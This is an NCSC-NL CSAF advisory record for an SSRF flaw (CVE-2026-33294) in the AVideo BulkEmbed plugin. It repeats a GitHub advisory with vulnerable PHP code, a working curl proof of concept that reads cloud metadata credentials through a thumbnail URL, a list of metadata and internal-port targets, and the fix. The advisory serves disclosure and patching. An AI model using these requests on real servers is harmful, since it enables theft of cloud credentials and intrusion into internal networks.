{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33294", "tracking": { "current_release_date": "2026-03-29T16:14:50.660199Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33294", "initial_release_date": "2026-03-20T15:28:51.640094Z", "revision_history": [ { "date": "2026-03-20T15:28:51.640094Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T15:28:57.672959Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-22T17:24:46.973047Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-22T17:24:56.215045Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-22T17:39:07.104690Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-22T17:39:17.247175Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-23T07:35:52.574609Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-24T21:27:03.051024Z", "number": "8", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T21:27:13.881697Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-24T21:37:41.407622Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:43.839367Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-25T14:39:33.109241Z", "number": "12", "summary": "Unknown change." }, { "date": "2026-03-25T14:39:35.134352Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:41:57.860420Z", "number": "14", "summary": "References created (2)." }, { "date": "2026-03-26T00:47:25.456636Z", "number": "15", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (17).| Product Identifiers created (16).| References created (3).| CWES updated (1)." }, { "date": "2026-03-26T00:47:37.751892Z", "number": "16", "summary": "NCSC Score updated." }, { "date": "2026-03-29T03:16:15.706923Z", "number": "17", "summary": "References removed (2)." }, { "date": "2026-03-29T03:16:18.324022Z", "number": "18", "summary": "NCSC Score updated." }, { "date": "2026-03-29T16:14:22.043148Z", "number": "19", "summary": "References created (2)." } ], "status": "interim", "version": "19" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<26.0", "product": { "name": "vers:unknown/<26.0", "product_id": "CSAFPID-5874460", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=25.0", "product": { "name": "vers:unknown/>=0|<=25.0", "product_id": "CSAFPID-5840724" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33294", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "notes": [ { "category": "description", "text": "## Summary\n\nThe BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail.\n\n## Details\n\nWhen saving bulk-embedded videos, user-supplied thumbnail URLs from `$_POST['itemsToSave'][x]['thumbs']` flow directly into `url_get_contents()` with no SSRF validation:\n\n**`plugin/BulkEmbed/save.json.php:68-105`**\n```php\nforeach ($_POST['itemsToSave'] as $value) {\n foreach ($value as $key => $value2) {\n $value[$key] = xss_esc($value2); // HTML entity encoding — irrelevant for SSRF\n }\n // ...\n $poster = Video::getPathToFile(\"{$paths['filename']}.jpg\");\n $thumbs = $value['thumbs']; // ← attacker-controlled URL\n if (!empty($thumbs)) {\n $contentThumbs = url_get_contents($thumbs); // ← fetched without SSRF check\n if (!empty($contentThumbs)) {\n make_path($poster);\n $bytes = file_put_contents($poster, $contentThumbs); // ← response saved to disk\n }\n }\n // ...\n $videos->setStatus('a'); // ← video set to active, thumbnail publicly accessible\n```\n\nThe `url_get_contents()` function internally calls `isValidURLOrPath()` which only validates URL format (scheme, host presence) — it does **not** block requests to private IPs, localhost, or cloud metadata endpoints.\n\n**All other URL-fetching endpoints are protected.** The `isSSRFSafeURL()` function is called in:\n- `plugin/Scheduler/Scheduler.php`\n- `plugin/LiveLinks/proxy.php` (two call sites)\n- `plugin/AI/receiveAsync.json.php`\n- `objects/aVideoEncoder.json.php`\n- `objects/aVideoEncoderReceiveImage.json.php`\n\nBulkEmbed is the only URL-fetching endpoint that was not hardened.\n\n**This is a full-read SSRF**, not blind — the HTTP response body is written to disk as the video thumbnail and served to the attacker when they view the video poster image.\n\n## PoC\n\n**Prerequisites:** Authenticated session with BulkEmbed permission. The `onlyAdminCanBulkEmbed` option defaults to `true` (line 41 of `BulkEmbed.php`), but is commonly disabled for multi-user platforms.\n\n**Step 1: Authenticate and obtain session cookie**\n\n```bash\nCOOKIE=$(curl -s -c - \"http://avideo.local/user\" \\\n -d \"user=testuser&pass=testpass&redirectUri=/\" | grep PHPSESSID | awk '{print $NF}')\n```\n\n**Step 2: Send BulkEmbed save request with internal URL as thumbnail**\n\n```bash\ncurl -s -b \"PHPSESSID=$COOKIE\" \\\n \"http://avideo.local/plugin/BulkEmbed/save.json.php\" \\\n -d \"itemsToSave[0][title]=SSRF+Test\" \\\n -d \"itemsToSave[0][description]=test\" \\\n -d \"itemsToSave[0][duration]=PT1M\" \\\n -d \"itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \\\n -d \"itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/\" \\\n -d \"itemsToSave[0][date]=\"\n```\n\n**Expected response:**\n\n```json\n{\"error\":false,\"msg\":[{\"video\":{...},\"value\":{...},\"videos_id\":123}],\"playListId\":0}\n```\n\n**Step 3: Retrieve the SSRF response from the saved thumbnail**\n\n```bash\n# Extract the filename from the response, then fetch the poster image\ncurl -s \"http://avideo.local/videos/{filename}.jpg\"\n```\n\nThe content of the internal HTTP response (e.g., AWS IAM role names from the metadata service) is returned as the image file content.\n\n**Cloud metadata example targets:**\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/` — AWS IAM role names\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}` — temporary AWS credentials\n- `http://metadata.google.internal/computeMetadata/v1/` — GCP metadata (requires header, may not work)\n- `http://169.254.169.254/metadata/instance?api-version=2021-02-01` — Azure instance metadata\n\n**Internal network scanning:**\n- `http://10.0.0.1:8080/` — probe internal services\n- `http://localhost:3306/` — probe local database ports\n\n## Impact\n\n- **Cloud credential theft:** On AWS/GCP/Azure-hosted instances, an attacker can retrieve cloud IAM credentials from the metadata service, potentially gaining access to cloud infrastructure (S3 buckets, databases, other services).\n- **Internal network reconnaissance:** Attacker can map internal network topology by probing private IP ranges and observing which requests return content vs. timeout.\n- **Internal service data exfiltration:** Any HTTP-accessible internal service (admin panels, monitoring dashboards, databases with HTTP interfaces) can have its responses exfiltrated through the thumbnail mechanism.\n- **Scope change:** The attack crosses security boundaries — from the web application into the internal network/cloud infrastructure, which is a different trust zone.\n\n## Recommended Fix\n\nAdd `isSSRFSafeURL()` validation before the `url_get_contents()` call in `plugin/BulkEmbed/save.json.php`, consistent with all other URL-fetching endpoints:\n\n```php\n $thumbs = $value['thumbs'];\n if (!empty($thumbs)) {\n if (!isSSRFSafeURL($thumbs)) {\n _error_log(\"BulkEmbed: SSRF protection blocked thumbnail URL: \" . $thumbs);\n continue;\n }\n $contentThumbs = url_get_contents($thumbs);\n if (!empty($contentThumbs)) {\n make_path($poster);\n $bytes = file_put_contents($poster, $contentThumbs);\n _error_log(\"thumbs={$thumbs} poster=$poster bytes=$bytes strlen=\" . strlen($contentThumbs));\n } else {\n _error_log(\"ERROR thumbs={$thumbs} poster=$poster\");\n }\n }\n```", "title": "github - https://api.github.com/advisories/GHSA-66cw-h2mj-j39p" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33294" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33294.json" }, { "category": "description", "text": "## Summary\n\nThe BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail.\n\n## Details\n\nWhen saving bulk-embedded videos, user-supplied thumbnail URLs from `$_POST['itemsToSave'][x]['thumbs']` flow directly into `url_get_contents()` with no SSRF validation:\n\n**`plugin/BulkEmbed/save.json.php:68-105`**\n```php\nforeach ($_POST['itemsToSave'] as $value) {\n foreach ($value as $key => $value2) {\n $value[$key] = xss_esc($value2); // HTML entity encoding — irrelevant for SSRF\n }\n // ...\n $poster = Video::getPathToFile(\"{$paths['filename']}.jpg\");\n $thumbs = $value['thumbs']; // ← attacker-controlled URL\n if (!empty($thumbs)) {\n $contentThumbs = url_get_contents($thumbs); // ← fetched without SSRF check\n if (!empty($contentThumbs)) {\n make_path($poster);\n $bytes = file_put_contents($poster, $contentThumbs); // ← response saved to disk\n }\n }\n // ...\n $videos->setStatus('a'); // ← video set to active, thumbnail publicly accessible\n```\n\nThe `url_get_contents()` function internally calls `isValidURLOrPath()` which only validates URL format (scheme, host presence) — it does **not** block requests to private IPs, localhost, or cloud metadata endpoints.\n\n**All other URL-fetching endpoints are protected.** The `isSSRFSafeURL()` function is called in:\n- `plugin/Scheduler/Scheduler.php`\n- `plugin/LiveLinks/proxy.php` (two call sites)\n- `plugin/AI/receiveAsync.json.php`\n- `objects/aVideoEncoder.json.php`\n- `objects/aVideoEncoderReceiveImage.json.php`\n\nBulkEmbed is the only URL-fetching endpoint that was not hardened.\n\n**This is a full-read SSRF**, not blind — the HTTP response body is written to disk as the video thumbnail and served to the attacker when they view the video poster image.\n\n## PoC\n\n**Prerequisites:** Authenticated session with BulkEmbed permission. The `onlyAdminCanBulkEmbed` option defaults to `true` (line 41 of `BulkEmbed.php`), but is commonly disabled for multi-user platforms.\n\n**Step 1: Authenticate and obtain session cookie**\n\n```bash\nCOOKIE=$(curl -s -c - \"http://avideo.local/user\" \\\n -d \"user=testuser&pass=testpass&redirectUri=/\" | grep PHPSESSID | awk '{print $NF}')\n```\n\n**Step 2: Send BulkEmbed save request with internal URL as thumbnail**\n\n```bash\ncurl -s -b \"PHPSESSID=$COOKIE\" \\\n \"http://avideo.local/plugin/BulkEmbed/save.json.php\" \\\n -d \"itemsToSave[0][title]=SSRF+Test\" \\\n -d \"itemsToSave[0][description]=test\" \\\n -d \"itemsToSave[0][duration]=PT1M\" \\\n -d \"itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \\\n -d \"itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/\" \\\n -d \"itemsToSave[0][date]=\"\n```\n\n**Expected response:**\n\n```json\n{\"error\":false,\"msg\":[{\"video\":{...},\"value\":{...},\"videos_id\":123}],\"playListId\":0}\n```\n\n**Step 3: Retrieve the SSRF response from the saved thumbnail**\n\n```bash\n# Extract the filename from the response, then fetch the poster image\ncurl -s \"http://avideo.local/videos/{filename}.jpg\"\n```\n\nThe content of the internal HTTP response (e.g., AWS IAM role names from the metadata service) is returned as the image file content.\n\n**Cloud metadata example targets:**\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/` — AWS IAM role names\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}` — temporary AWS credentials\n- `http://metadata.google.internal/computeMetadata/v1/` — GCP metadata (requires header, may not work)\n- `http://169.254.169.254/metadata/instance?api-version=2021-02-01` — Azure instance metadata\n\n**Internal network scanning:**\n- `http://10.0.0.1:8080/` — probe internal services\n- `http://localhost:3306/` — probe local database ports\n\n## Impact\n\n- **Cloud credential theft:** On AWS/GCP/Azure-hosted instances, an attacker can retrieve cloud IAM credentials from the metadata service, potentially gaining access to cloud infrastructure (S3 buckets, databases, other services).\n- **Internal network reconnaissance:** Attacker can map internal network topology by probing private IP ranges and observing which requests return content vs. timeout.\n- **Internal service data exfiltration:** Any HTTP-accessible internal service (admin panels, monitoring dashboards, databases with HTTP interfaces) can have its responses exfiltrated through the thumbnail mechanism.\n- **Scope change:** The attack crosses security boundaries — from the web application into the internal network/cloud infrastructure, which is a different trust zone.\n\n## Recommended Fix\n\nAdd `isSSRFSafeURL()` validation before the `url_get_contents()` call in `plugin/BulkEmbed/save.json.php`, consistent with all other URL-fetching endpoints:\n\n```php\n $thumbs = $value['thumbs'];\n if (!empty($thumbs)) {\n if (!isSSRFSafeURL($thumbs)) {\n _error_log(\"BulkEmbed: SSRF protection blocked thumbnail URL: \" . $thumbs);\n continue;\n }\n $contentThumbs = url_get_contents($thumbs);\n if (!empty($contentThumbs)) {\n make_path($poster);\n $bytes = file_put_contents($poster, $contentThumbs);\n _error_log(\"thumbs={$thumbs} poster=$poster bytes=$bytes strlen=\" . strlen($contentThumbs));\n } else {\n _error_log(\"ERROR thumbs={$thumbs} poster=$poster\");\n }\n }\n```", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-66cw-h2mj-j39p.json?alt=media" }, { "category": "other", "text": "0.00025", "title": "EPSS" }, { "category": "other", "text": "3.7", "title": "NCSC Score" }, { "category": "other", "text": "Exploit code publicly available, There is exploit data available from source Nvd, The value of the most recent EPSS score, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5874460", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5840724" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-66cw-h2mj-j39p" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33294" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33294.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-66cw-h2mj-j39p.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-66cw-h2mj-j39p" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33294" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5840724", "CSAFPID-5874460" ] } ], "title": "CVE-2026-33294" } ] }